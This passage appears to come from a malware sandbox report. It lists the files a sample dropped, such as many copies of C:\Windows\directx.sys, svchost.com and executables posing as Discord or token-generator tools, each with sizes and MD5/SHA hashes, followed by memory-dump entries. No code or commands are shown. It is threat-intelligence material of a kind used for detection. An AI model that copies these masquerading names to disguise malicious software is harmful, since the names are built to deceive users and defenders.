978b3259cb7e4778c92fe2984b972aee66bfbede

SHA256
97c26eaa1844d8a7a33fe682bb2264dfabd3eca5529f27ce680de0ddb743aeb9

SHA512
12bc56f1ba466b3b0bbeebb709996eb53536d4f6126c9f70b20f45d06422e71f398e6dbbeb32f127e629e7f36effd85ddc8d035ec26fa10c10bc0139261b1694

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
b55e10a91d8656235f8e4743b40f2d65

SHA1
95fc416b2c8c94cf2be940856c58cb9b164ddaa3

SHA256
8edba86c876c0b8ec6f9e82ea3231365bebd26d31cdfc65b60d7d9636b4cb65c

SHA512
bd4081c98058642eaf62570564378d436a73df68d885917cdacc39534b99d59ba9679d0bd4518a3cdf98c05c2ab5310e6ac773f0b335390012dbc295a69f887e

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
ee0435f6508069850bc420b50311e313

SHA1
6cf1aeb015bbac92ff7fbab7e022f79767181bbd

SHA256
6da6a3702a64e9487037ae797a961a65c0cf6dfe48deda8e4beda383d4616880

SHA512
215247c85c8a10e84cabb7eec8f55c3ed02564d78f9e7af75e7ed863c97d25a6463a48a8c7ed6129a4e82f6bce5d79966e84063d8f9eb1e256ece7cac81e550a

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
f397037f4d94ec22ede1a7e53c00a445

SHA1
418bed8aeeb1d43ec43ca8a7cfea6d6b0c4fa0d3

SHA256
6f5836e848a51d90e24042348ec01ab15e995795f7889fc7ffd815c518ec07cd

SHA512
24d6bea1d1804444531acf69dfee93dec6686607b26a70a01f71f01fa6b91c77477e0627922e323193b20496b01b31fe90a90233a82174a42172c5e426d4fe32

Download Submit
C:\Windows\directx.sys

Filesize
29B

MD5
8e966011732995cd7680a1caa974fd57

SHA1
2b22d69074bfa790179858cc700a7cbfd01ca557

SHA256
97d597793ec8307b71f3cfb8a6754be45bf4c548914367f4dc9af315c3a93d9b

SHA512
892da55e0f4b3ff983019c11d58809fdcb8695d79c617ddc6251791308ee013bf097d1b4a7541140f7a01c56038a804974a4f154cc1b26e80e5cf5c07adf227c

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
0e44cc6f8bd20dfbd5cc8f16bc99633f

SHA1
8987d9d9ecf3432b9c300fb7ac249efbbad8f2d9

SHA256
b439e24b645342e0cf1db2c8830a8af20f6488bca0a70f700807b5662a898147

SHA512
42f395b08f28e1b65018090e67c52fa00b744a1a4bdf8d593617a8ea1e30dc64f550ef83824e85ba128091baf2992b98ee759c2e670cb0cdb0fe51202ec924f7

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
fc3cd004ab7d8f6f72bf49bdfc2eb364

SHA1
d2cdb90a04383a809f672335e175f7c205c5eed4

SHA256
d5ab561d7466a46858fdfc2454608deecc87e24c8729b468678d99ed8ed081cf

SHA512
65cf63a468907a66f897b4a858fa297bc8ed131cb0dcb15694f9dc5f41c5a3118fd13192892162916744e43348fb7a6877a2ada4be48bb475287add4a7caf831

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
1fffa1f483b430fcdf5dfd34358c3be3

SHA1
e95d15f95c2d57a0eeea6e59018891d147a8cfd9

SHA256
ba397194d949bf3c44fddebb291a69524429c78737833d41054ec23b543fc519

SHA512
adf11a621516dadbfbf6d323ae1a6a917868878ab34cb6f381a6701c480817424743e3cef3127db11eec85ae0acc9f5366a272490234b67735f8bb5346c4e816

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
d1b112aac814e75d0932882b002509f4

SHA1
243e2af3ea6fd501d900897972ebdfa80803eff9

SHA256
ba10e07371955930c5885be5839a3c3b3db536488edab06a0befb7cd34f2e725

SHA512
f228620c6d203b0d78084728024846e4b650a63838740549712128f3c5739b26fd0f3d9e060f7f6b2177eb43ccec50e10bfae6cbbc4dd115493aac66074703e1

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
6bbbcd101499656cb9b59ba666068b3c

SHA1
b9e5f7863b13fbdc14fa219a22a4b8b35edd2b2b

SHA256
ceb0f8da2ad4ed5860aa98a3c82cb899e06ed8d0c27578af4a75f7b176839825

SHA512
338b3617a549ba48f354b864f08ded915c2eab641060171c6f5081664b320557f2da2fafc2ffeb5085e04190777662eb6e4f601abae1edc014533467e0210b86

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
4080d21440b07a016ab6551144c4d24a

SHA1
b991127bd55377ebd91c5aa95b0d18a5a4f89ab5

SHA256
b3eedb6957ea0a9d42edf18c16e0872513365c9d6cfb72f5755ef87debe22cd6

SHA512
54517aff2c7ac700a80e8eb5b349bf320106584bb120bec03cf0cdbbf2838f23530de359a273df7438022d5bad72a04699c7bf4cb52a006f95392a3a639bf81d

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
a0f1bbeec56e999a8b953628223f767f

SHA1
aaeb3481f69aac0c0593705ec19ca9304612d566

SHA256
54494a52e80042c01b52d0a78a8c3cd6f8e0116fc5c87cf682042e1e0eda146f

SHA512
7008c5f32a40c8e137d83900f03aec021147ef69dd54ea200533862e58879c23a2058feca369a431b63239a6c24a919d9f302ab301b86dae3418077626546bc0

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
b7513f58ff48619e12e521ecc8770a9f

SHA1
c85875d6c591f67ca0a380ed191746361b8bb3fa

SHA256
9b8bfa9d56e429b34571813824edcb81cc3a593eb1accb4954f4df775efaf0fa

SHA512
d656d62a67092021426606165aefad0b361d1a9cb0ff0f31f1d6c51b6bca7ad2a954c94cf284be8acccde2f1e54f168d53f36c1274cc99e479389ebdd2668f71

Download Submit
C:\Windows\directx.sys

Filesize
145B

MD5
3023a258b980cb6aa68a14c055e71d23

SHA1
1d0a60b8594ebea7618f72d8613ecc6a9b68cd01

SHA256
073c5586045d7e622af388b10a20f0c567df84df9f71ba9915d6c2bb819836b9

SHA512
279ff87853835610b831b3614a63129e11b54acdf0e7e0074d0b4ae391b01eac6b4693a50d9712d5de9f556b15e76e2e08fc55abd2c1e1c4c9bc7ebdefe8759d

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
be4b930fa9447fc953f0a50c4a3cbbae

SHA1
73e314d32a61b9bac564ecbce32e84041ab716e5

SHA256
ac82d925997836deea57fe9672e131772a548e6b3e0fe1755ab881d81a3823ae

SHA512
7635fb042486565eb4899b4e64b3566827c795f7ce6755984f41ed87529bcd84e33b9804731e762621cf414ab04b813bf2f12c62fb47dfd6aa5a2b40f9855b29

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
48715d678e7569a4ca95cfc0a6a0a0d0

SHA1
764a481b629bf8f7e1af80b83492b3a8af255be0

SHA256
dc4e648e27aa02d81fe464ec58217d516fda9ed14f4debaab6d1bf58ffc9914f

SHA512
d068961635a2cd823d625dc09dda81defcc3b2f9da2fb6f856781f333e3a1fe3e22e1a49726e294ebcfaf879cd9f840a4318fa4ee78bf1f403b43a4be054414b

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
1d88b50cff07f1ba789a84a6cdc7f386

SHA1
a34afaaa5d4a657fcf02841051352382e2d04445

SHA256
3bf6695f5203422f6ea95a25bdff34b7622a3d4429324f98a7f25e42a703c17c

SHA512
8665171fc5e0f8f0432f80aaf13e5373570d279f90dfc4415fea85b89da2c55c9ff22c0f29ef5e3cd4d7806a4b933e77229c7c08f8720e509d9e367bcd54e93c

Download Submit
C:\Windows\directx.sys

Filesize
52B

MD5
c641c78abd45af84b300aef05b41112d

SHA1
d4f5598621e9307dff32f2e494e70c1a8b6d2c59

SHA256
26cc678b87c386317ccd418b25e9812d4d4e978918ec3fbc0d8841587d6fe5af

SHA512
03cfad2140183d01417e1e984b6b6e53687c6c60a35c2579ec6adbd2350b3bbe7a97c262fb6ac371219686c81ce534462c3d1ca169ae18383e4dc398635483c9

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
749429bbcae61bd903c7cdb1011b13fc

SHA1
fa93f9d3d9b4373435d4e783781de240bc33cdb9

SHA256
58530d40cf8d22ab02d18019dc26516b5e2547b700dc18cff1d042291de8a589

SHA512
d6f99e3834384228d7837680cdfd52597efb44324d2c24af9a7e060d9c5eb045de6aba6a78e684edb81db9d0966996a55ccf3aa5b41c62ff5b3936d09ee83745

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
d3135d8b6d63b7c05d624ca5f1fd0ced

SHA1
15386254dd4bfff7d146313bf316189cdffef712

SHA256
913c1d080dfbbb53c14c39b0524728a21b22072c6f8baf7929fc10e9ca2a6432

SHA512
cb34ef34f4c23f6c424800d999576798947f10c5c06bb6a2c8f1410cc79b50ca68d4170303e199bce065a6cf55b3aaf7e5d79b03379404ab991c0298978a439c

Download Submit
C:\Windows\directx.sys

Filesize
62B

MD5
ce5af086aa836bc39308551b5a5b24fc

SHA1
3fb919ed81cca066eb12bee0d465d983d3329290

SHA256
e48afcd68448cb4a2fc6f8631ed00a704a4e43b1cb7abb226bdd26f8e9f6486c

SHA512
c592e7160887aaffad28a8b6e1d3f4337e81a763a7f473e19b9cf718e17b463ad67b1ff2866080a5e8f929b16e4adc4cb971b311d1be0d64cc8b308d47085722

Download Submit
C:\Windows\directx.sys

Filesize
44B

MD5
797a912d6b01adc7d12eee59daeda865

SHA1
ccf8daf3c1072a859c284257e2d249f982f580ad

SHA256
50a122fe003fecc37cf166a5d5a203e7bf9a32014e1d72a1d633ab016739aa47

SHA512
0d662df93e62ea4a7e1bb0fbbe582ddaa00d5aa5da1deb993633d669e39f22945aad19d206bb2b62d16e0f82356b72f652553363b6a72832232c4fd1a6e1612e

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
2ed58dd8fbf79e3586f19e1a690c3d95

SHA1
6061859d0e7389f8c1d843bf3d62f994253d1418

SHA256
fe9ab8d2913498f152e5a6abaaf657235d08713ea449b28c575df6b74d383291

SHA512
c5469e65b53373f707c5574cac9fd82d590d7832342d500a5da56441f6f585370312545ba2d371e1e17fabd2bd40bceae9655efa7ac4418dda8d20d7a321da9a

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
7c70dbd65e9f5383c68ad74a2f59ba4a

SHA1
4fc48eaf27cf2d18cdc388582b9abffbb3106249

SHA256
74021fb056b144c92c8475e6aec41c8a160ba52e06620c339efc082bb384f45f

SHA512
4604a553d08ebdeb7e46497c49e905f0fb93d7de33c41b938de59cba1832098d2a5a386619dfc6a765a91dd9daa5ecba670cc6d486c32458906ad0a185e905ad

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
92bfb91d5b2a50e1fec33cab2f93213c

SHA1
4b3d2674166319e88feceb0b427218291be27bfd

SHA256
c16b774d6fd73c7a59fd0fe665a2ed64489282145c0ae7dc8f2b4d81b74630e6

SHA512
5e1e349740dd8c7dc31c4dd13c221b862bad3648c2e714da7bc832586b3b0caec5bbcafa36c39f32fce3a7a6d42d3188222f51654ef41b693d5800a147eabc9c

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
8c569627ab3c1e0fe81a61a326cc73b8

SHA1
1f8dd7b53e24456874e468b200e241c867cb76d9

SHA256
895d1259669f6fe45646b206d5c935f82c2751df20d50ab41fc86712f68c254a

SHA512
de58e9ef61a2aed310a736966ebf8f19a1429a20e7dbdde7faff1c09b82fae0e30e5e69d7af3ef291c558ebdcb2a8e1b9f87214a72b2505d8272eec00d2038b0

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
6dc7ee761433eb01fd7342bcde6aa1d4

SHA1
72c55d724c93be8b9946e7b147bc6785a5c533ef

SHA256
97abf3d62e038e4e0a9ee72c86e7a2680589280d72fdd7d7ce577498ed5b02bf

SHA512
2ee62dd3a3d3e25e1c8eb54272944beb9028712bef252e50a8dc98fef98b11c49b364ff62f170f00195be04172598b5a91bc1d3d7c5c152a8dfe1109bae40ecd

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
e6d08ffa82d6e76035bff4b3f061881c

SHA1
4edb8d85fd0ff97eed603c9288a98309a1453c44

SHA256
ffd7e63176e84c75dc6140cfbff7bd295605e6956ac7a012be495c7c78d16409

SHA512
aefceab54748e889e09c656828f6864be2b51c7fbe14d759ca6b544b57c7216a5f525ed3287b070a25d4f86e9633b52a9d41b42538b832ad2decbf8ab8bbeac7

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
8d0b1a40bf054496c2f82b4be3ffed13

SHA1
93551d9c8c0ec16062128bfee167fc5ce772d196

SHA256
ab2303d7b131e231fa0bd99c3099e324f24811105f78987cef8edb4aba8e2c08

SHA512
fa464d774177fcf38c28cc531511b3678d0d9fbec1fc827d00bba6c90e8040de8089f2ee083308aea78b2bf0f6caff3172516bffaee34540b0862c0e214c35b7

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
9b1109b4cfe2d0521d7c6f24c475c945

SHA1
9912489c035735d4b53ea06f3a5b6abbb5af1560

SHA256
f1fbbca785b57963f2a5f67532e13d67ef14afa5971f09d9c4ea0f715fc0d93e

SHA512
a74bed6ffddf6837847ae465c422a5975a298d317de225f09ca5dc7b4c62656b1f364216bfb97be6b99732247e3186700842b3579d5815e5828b76e4c26be796

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
e20ab30808977846f0566e24b53a964e

SHA1
b8d6898562ff4e48dfa165f4e97d7666f8948ded

SHA256
a2610f0dc936b440d252ddb0cc81a5860a64bf1641f0c5953ec4234aaee47f1b

SHA512
18a6db95138f090d70fdc6d27ea2eba0728e2d98f4b0f630da680deeab1298bd41314c206d26a77e4c392b7870650c216ce9d6ce6ff89ad493c1f915a066cd8a

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
6dd76cdc398a295c4d6b2d91756a3e71

SHA1
e4496d170488a0482be3d26452d046be56a9bf65

SHA256
94a24a3de5f458950b12d788c2bf31d242289f36b4f0fbc59c35c19db120d10d

SHA512
43401a976e8886e5175b656eda0ca21be230a642f23aa566db1ba1607f271b3416e636013612217bb73578cfddfa0401e1332d7594ee7262f6385930c78ce9b0

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
f687cf6893c7541df8a3a73bb1b75c11

SHA1
10c6c7b682a41f32d9247caf48d6e76652c831ec

SHA256
554458968cd50219a3f6065798a2d604e663e48e6cf6a65faf3827b4745614e5

SHA512
2dec97a050ff01a9ba7d9296d4bc454ba213e79f5b5a4d908e084a5f13debaee6c16169a7d921abc0b80463a6c5fb6562bb71825327f2853419529827d585603

Download Submit
C:\Windows\directx.sys

Filesize
80B

MD5
5e7b770c026dc47716299eb4ae188498

SHA1
3d2fa9a2368f9c275786d8ab33fa742ec0a40379

SHA256
8452e38af2c8d2ba8963587e550d95b079c64a79ddd1f89b901dff3014eac259

SHA512
b92f6234cf66f3b0c3d1d16ac233219a4c1a8c7eb783cf8b2fa252571093365523d09dc658f563b4d47f107021239912d578c8aac6e516369e20a3c68544b3ab

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
84ee29475532863d7e6aa53705cf40a9

SHA1
acb3d49dd7de902e320031fbffc6d943475df504

SHA256
c48e73150bebc48acc81bfa1bbe0729a678c3fe2f90cb35598a5ae0b19bf33a0

SHA512
907ba3f6bb0f16aed5943c06129e41a89f715c33a3d34e52252da90263c7552a4202d9bc9fafd80fe780613e14843348a5406090b25eb3fc4fdbf233da911212

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
a8d4d1cf0dcb32da333ed4ced5066196

SHA1
022fe0dc2d0d73f86f7601fc895cf5e1c1abda93

SHA256
7b711c7ed5447023be7f1116d1148446741caa6f8068eb074b8ba3319244b702

SHA512
ece4be303ad729f718fbf76ed817a355f9ed6050ab7ec9ae2f54e7701f0a9c60315da5937c6076749bef920172bbfbe82fc21a163a531b6fc617e61b32f8713f

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
3ab89975ad2bba859efa91ec001d7c9c

SHA1
9105f6824b087528ba3667ba5dc0f557e0004b95

SHA256
f56a3afa0193ac84248069270727dcf1c4326c83fc09e19b7a8aaf07383658c2

SHA512
2a9152bb545906b0252361970df133e553f6650da6e8d7d02aab87b71285ec956c1c8af48b8b2d555dea6fb13f0013b3f3d9c7217cab1407fe6154971f13c122

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
812aefc7608e9971403f5d6a3ceeee75

SHA1
7373d58b6bbbda3a03f9153b2b105a1432648aad

SHA256
530061aad42a571118665f0e53563f604e0de44dcce560f2382247677d37eb61

SHA512
ec783c05614154e5a75ca02d8a359ba81fa8ca55b4f21c47f42a2054bc967ca99191ee7f4bc3de6e265ed3ca77ad840ba066fc01eb18f11ddfe6bda8038ad227

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
da77d320d9dcd96eec90454dd7d31a99

SHA1
f6d3e80696a5af9a43187ecaed50b6a2735b6b65

SHA256
431686d7b194b6ca484b51022ff3b3fa2ee5ba735066041c06fb748cd6fe0955

SHA512
edd0ca1564d5d48ad9f3290c1082790cf9425285f5bc8c180160faec6525d2c7f9c06b32aee6028ef3944825c628daa670eddd4d6f715de53154700ea05b32d2

Download Submit
C:\Windows\directx.sys

Filesize
34B

MD5
455f41a17aa647dc770995c92d30ab37

SHA1
7826d2329a4358f017fea3506466ad04dadd67e7

SHA256
a6bdb1ffae7d8f0e991f9980a872f15d4a5a09881f025268c4932fb2c275fb9d

SHA512
b891e58697cf008a90bbbe61e8adc66d1f8c3ea87a1c19ac912d020565bfa23e6e4a432dda7f155105968d024119ecf89b55de8477c1ce4a50c703e6340e5491

Download Submit
C:\Windows\directx.sys

Filesize
85B

MD5
e8d4bedb84d6a40cfed198a9e6f07c3b

SHA1
433b010618765358c31a00d9582e2809ee0ae50c

SHA256
724ff49cf32473c6eee5b8017bb2b0d9c82253bfab5827fef4be6205e043f574

SHA512
c81a0daed95a584a2ae2d8b2ea23691449ac396520bc43892dae7672cdd7f6c94f449e1d494585f09b06ebb7de54009a8aa61e15d29a578d7c7f2e1a4028d28c

Download Submit
C:\Windows\directx.sys

Filesize
63B

MD5
1da560e31309d780522b2be926641cb0

SHA1
cd9c58da7069280a3e1bf5adf740faa970e1b350

SHA256
ea29a3fceb837784b74f938e4312effb1d92f0bea687f8d81771533f0c0ab4e8

SHA512
6d5f2b72c4aa441d78d1c32d5045882fc91b035aa2bc421c5dee617479b5b15d6578c558f5832db689dd57941e023ae2d6c57e9080ddba0cfb8fd8c276cd665f

Download Submit
C:\Windows\directx.sys

Filesize
87B

MD5
14d6f0cfe4bf936a7de269114d08758d

SHA1
60a3de3e906a6ea22016c67fbc3d5bc12942bc49

SHA256
97fdd08b1968858518a407b985a6966550434e0659b425a95bc9c66a1ed57175

SHA512
e32bf79b2669a80dd9f7ab7f3af96f61d71c04c6ab1853b0ffb6a205d4606656ae3a26153e32adf894e582311e9bd2605ea078f87e7f41c986316423d5a0e3e6

Download Submit
C:\Windows\directx.sys

Filesize
87B

MD5
43533dbcebff1835b7cdcae72086bd28

SHA1
dd921736184065d1bd1277ea39e0af0076c45d72

SHA256
0a761e6ebb0fbc4cda42e35ff43c26e7d912b1c1206ec4f9371fa737f4d6d562

SHA512
1a4e8a2c5ffa3107356aa7e3a427be187468ae35ada3317bd9525563fec72c446a16a2a908f6513ba13de496f518d54b996aa6f6e8972d01f33df6b320e9b8ee

Download Submit
C:\Windows\directx.sys

Filesize
84B

MD5
44154ea7da08ae4f9614fcf74c7b6fad

SHA1
7bb7a2668f64568c4690b52c1786289d5ff1be45

SHA256
461b450e497931116fd27ed25d9094413b7e66b42bd41f244477e449d9b61d5c

SHA512
792a56d3c89c95862bb47d9baa9e1032c31ccf57e8428cd41037f203547f1de71097c5e93a7b38c54a45c0c2cd01ed1b3755ca1167f8d92203739a3eb73b14ce

Download Submit
C:\Windows\directx.sys

Filesize
88B

MD5
e91dcb7eeee5a128f809f4bf10d37e0f

SHA1
31d999b5cd051c5a0816c083fb2af0a72296cdba

SHA256
817a31528e440bfa28a3212850cb169fc9c99d62161891a7d6bdadb3d9f7e9de

SHA512
18d7b3ecfb9bc2a43b7264f193dda39adc91a23340ff1ee9b3699ecdba4e14c368b90c6c231a243b801c56977a5367779ec1fb09bbc2587d2dab0a8fe3e9857c

Download Submit
C:\Windows\directx.sys

Filesize
87B

MD5
caf55de7274b0fdbb9e98e55c64aead3

SHA1
769253128d297532a934c0e3db85fbcf885a2d91

SHA256
4d1ff66493380c59e36a884bd36f93be8380027d96ca780a916655f3a9a70b98

SHA512
415903add64ae6d3c7fc22aa3f8f0f0aadf4959b9c4d6958d74851ee7eaf0dad939ca997278b7758d2abeb59e33fe911a960e80f17dbbfe3c5b5cf5561c7b51a

Download Submit
C:\Windows\directx.sys

Filesize
86B

MD5
ca14afc5624c1daf3e8baece314cd5ea

SHA1
a589e03ef4b8f2aba515d1e543a115ea0067b1d0

SHA256
534a2f4ee3b46f20f1654772f4eadb068feb4a1d049dbc4810f4c4c11a6f2103

SHA512
c845ff6ce6ba780a72bcc8a0414e1d7351b1c655de2488e6dc368e3af9003db7e52847916614bc0b3d5b829cb07de11b602137be2f160a8d57f8000907b36d71

Download Submit
C:\Windows\directx.sys

Filesize
86B

MD5
6efcdf2b756f43a160619ff4c917c242

SHA1
cd061c644db9e57fde7a3f3d03389c0d8545efea

SHA256
ca681e5fd199252dd7cef9aa957acfdceb072a53eceb6ca2ef99f418460f0053

SHA512
0227ef98fee0f585a6e05cfe9a9976151982d894536de37ab578e35e69bd56db48514977e7c6ca3cd5ec835c8dda14fd7ff50e5f7bdde89400f955e84d869d74

Download Submit
C:\Windows\directx.sys

Filesize
83B

MD5
16fd7f125b38034bf0d58f694ffadfa7

SHA1
b042f06bb67f75bd75ae572300659fa5df60ea3e

SHA256
7852f9a3b1c54e1c8a1250e35351b328b2c5ceef8d01d7c54f314df4cf7eeca8

SHA512
dcf39327b69eb63a64c19c4a45144fcc35b43b93bd23bd446f0f33df35c5dcd1d1aea54de95581daac0ef1426d608be0eb16f2304031e7e46e64783f3a281c4e

Download Submit
C:\Windows\directx.sys

Filesize
88B

MD5
03398ffca7819f5e02cd920dacf323e2

SHA1
a2438ccc6349384e39fd8b23911d52bab2654316

SHA256
aa93641ba704f4791098ad7814c72475a21c1005a37ceed7d70e0a27400e8985

SHA512
5419dc07b3731f09705cf546d12b43f36f934f9f880d7d157903ad77742e51d249225d4bc705036f884e0abdcd1c9a58a42e3910e82955926cdcc8e6d3640ed6

Download Submit
C:\Windows\svchost.com

Filesize
40KB

MD5
ead203cb6aa81e842d32f43fab32c493

SHA1
124b348eb437e838674f5b9de4e98da20c17ef60

SHA256
c6845f33531b0405b1f2b248aa2e9c429bb074fd32589fa55d4429ce2dfc96ef

SHA512
a60434cb1ed67867613951ca4a09c8c3b7ba34ca7d03e16399eb96b771d41f96d7efdcd39f6e35cc1e341f273d3303584c3c981943e3e2d6bc016471f51cfc5d

Download Submit
C:\Windows\sysmablsvr.exe

Filesize
88KB

MD5
ababca6d12d96e8dd2f1d7114b406fae

SHA1
dcd9798e83ec688aacb3de8911492a232cb41a32

SHA256
a992920e64a64763f3dd8c2a431a0f5e56e5b3782a1496de92bc80ee71cca5ba

SHA512
b7fc70c176bdc74cf68b14e694f3e53142e64d39bd6d3e0f2e3a74ce3178ea606f92f760d21db69d72ae6677545a47c7bf390fb65cd5247a48e239f6ae8f7b8f

Download Submit
C:\Windows\sysvplervcs.exe

Filesize
96KB

MD5
930c41bc0c20865af61a95bcf0c3b289

SHA1
cecf37c3b6c76d9a79dd2a97cfc518621a6ac924

SHA256
1f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff

SHA512
fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2

Download Submit
\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

Filesize
268KB

MD5
de45ebaf10bc27d47eb80a485d7b59f2

SHA1
ba534af149081e0d1b8f153287cd461dd3671ffd

SHA256
a746597e9b0877a8a6d4d919279045bfea2801d74348b034f222466c2200ea21

SHA512
9228255ae7df9c3a332cce8451cf9298298f4f3aab8a25fe334258d76f11cd2bdb069452381cfa68ec46b16a7371dd1e9ad6dfd69c293f068422eae953f2f22a

Download Submit
\Users\Admin\AppData\Local\Temp\Files\Discord3.exe

Filesize
47KB

MD5
dcec31da98141bb5ebb57d474de65edc

SHA1
56b0db53fb20b171291d2ad1066b2aea09bad38d

SHA256
cf1597d08ba3eddf6839c3b54c723ccc1db8d1c6edc1f416d05de29cec36aa49

SHA512
5b9332fdb1e21a0559e1c8052f7fef46465e4d7ea2d49d6894ca2ce575ba8158f2166bb40ce26ad5f7ad4e9a93728e565959d49583981ac7dfb20c659dbaee99

Download Submit
\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe

Filesize
274KB

MD5
68da9ec6ceb5dfd69fd6a6a5290a94ef

SHA1
5f4c78e48c4d12dad0d1714fe1be515eff89b452

SHA256
a2798b69026fb2332e89ddd9ba0ddb82b7d658231bf8e4edd2577e25b76a0395

SHA512
137e4f1a9c6e56de900efe6ede8c48fc014a676e8552f98553b2e3f9716a9cb45b8a1304ecba6f8021d0dc2507e075ba2ec8c6d17443dc27eb85b9f5962a17ce

Download Submit
\Users\Admin\AppData\Local\Temp\Files\Token%20Gen.exe

Filesize
17.7MB

MD5
07aedf7930906cdcadde1e5c7b1e22fa

SHA1
4224cdb22baf8c3d49eb9d66da97ea63de0acc45

SHA256
b56ac555080fda9f494617edd75cba91cb95efd116cfa20c596f33b88455373a

SHA512
cdb2eeed99420cb0395ec29933b87e72fd9d7aa2987f05a7e6d26af35df0a16f156ee860f85939e6610dd09d2c41cd943f74511c19a57123fa36176b23f50099

Download Submit
\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe

Filesize
62KB

MD5
4aa5e32bfe02ac555756dc9a3c9ce583

SHA1
50b52a46ad59cc8fdac2ced8a0dd3fceeb559d5f

SHA256
8a9235655b1a499d7dd9639c7494c3664e026b72b023d64ea8166808784a8967

SHA512
a02cf44a9fd47cff1017bbccf1a20bb5df71afb9110cd10c96a40aa83e8aeaff898bef465d60572282b30087144794192882b998e278e3a03d8a7e5e24313756

Download Submit
\Users\Admin\AppData\Local\Temp\Files\buildred.exe

Filesize
304KB

MD5
4e0235942a9cde99ee2ee0ee1a736e4f

SHA1
d084d94df2502e68ee0443b335dd621cd45e2790

SHA256
a0d7bc2ccf07af7960c580fd43928b5fb02b901f9962eafb10f607e395759306

SHA512
cfc4b7d58f662ee0789349b38c1dec0c4e6dc1d2e660f5d92f8566d49c4850b2bf1d70e43edf84db7b21cb8e316e8bcc3e20b797e32d9668c69a029b15804e3f

Download Submit
\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe

Filesize
7.0MB

MD5
bcce9eb019428cf2cc32046b9a9f024c

SHA1
5464ad73e2321959a99301c38bf8d3c53f0565f1

SHA256
f2c4f0c152acbb4a8e575e6095fc84b6df932e114c4f2a32a69d1ed19c1a55f7

SHA512
55932437926ddda92b949a532de464e471b5ba7fad3667451dc748ff79a0bd9b2549e91199d03ebd01dcb85033ff0e2a7a0dfd99f9c56c037ae0ec75b7c9740f

Download Submit
\Users\Admin\AppData\Local\Temp\Files\postbox.exe

Filesize
22.0MB

MD5
c53bb047b93851b66fead144d7c46ff3

SHA1
42ef9d0a7efe477fabd290d16c30c63f5f576cd1

SHA256
54092d2fb30f9258ab9817de3b886997dbefdee2963b4d051b70c0309aea99e6

SHA512
7060e10d60d0699c7c06012a3e2be44f859ec06ec00bbd51331b5ac5169e88d14baf7949d2cd40bcebe42016f8a7d5a28a11c755a54675f5715dbee34cfc11a6

Download Submit
memory/600-1287-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/764-13502-0x000000013F050000-0x000000013F524000-memory.dmp

Filesize
4.8MB

Download
memory/904-85-0x000000013F320000-0x0000000140998000-memory.dmp

Filesize
22.5MB

Download
memory/956-1288-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/956-1285-0x00000000002D0000-0x00000000002F0000-memory.dmp

Filesize
128KB

Download
memory/1100-15421-0x000000001C710000-0x000000001CAF4000-memory.dmp

Filesize
3.9MB

Download
memory/1100-15612-0x000000001DA30000-0x000000001E208000-memory.dmp

Filesize
7.8MB

Download
memory/1100-15559-0x0000000000F10000-0x0000000000F1A000-memory.dmp

Filesize
40KB

Download
memory/1100-15368-0x0000000000F50000-0x000000000185C000-memory.dmp

Filesize
9.0MB

Download
memory/1100-15490-0x0000000000EF0000-0x0000000000F0C000-memory.dmp

Filesize
112KB

Download
memory/1100-15558-0x0000000000F10000-0x0000000000F1A000-memory.dmp

Filesize
40KB

Download
memory/1100-15453-0x000000001CAF0000-0x000000001CFD0000-memory.dmp

Filesize
4.9MB

Download
memory/1588-10779-0x0000000000320000-0x0000000000372000-memory.dmp

Filesize
328KB

Download
memory/1696-587-0x000007FEF5680000-0x000007FEF5AEE000-memory.dmp

Filesize
4.4MB

Download
memory/1704-762-0x0000000000A00000-0x0000000000CFB000-memory.dmp

Filesize
3.0MB

Download
memory/1704-922-0x0000000000A00000-0x0000000000CFB000-memory.dmp

Filesize
3.0MB

Download
memory/1704-601-0x0000000000A00000-0x0000000000CFB000-memory.dmp

Filesize
3.0MB

Download
memory/1704-755-0x0000000000A00000-0x0000000000CFB000-memory.dmp

Filesize
3.0MB

Download
memory/1736-383-0x0000000000D50000-0x0000000000D66000-memory.dmp

Filesize
88KB

Download
memory/1760-178-0x0000000001100000-0x0000000001112000-memory.dmp

Filesize
72KB

Download
memory/1812-1271-0x0000000001F20000-0x0000000001F28000-memory.dmp

Filesize
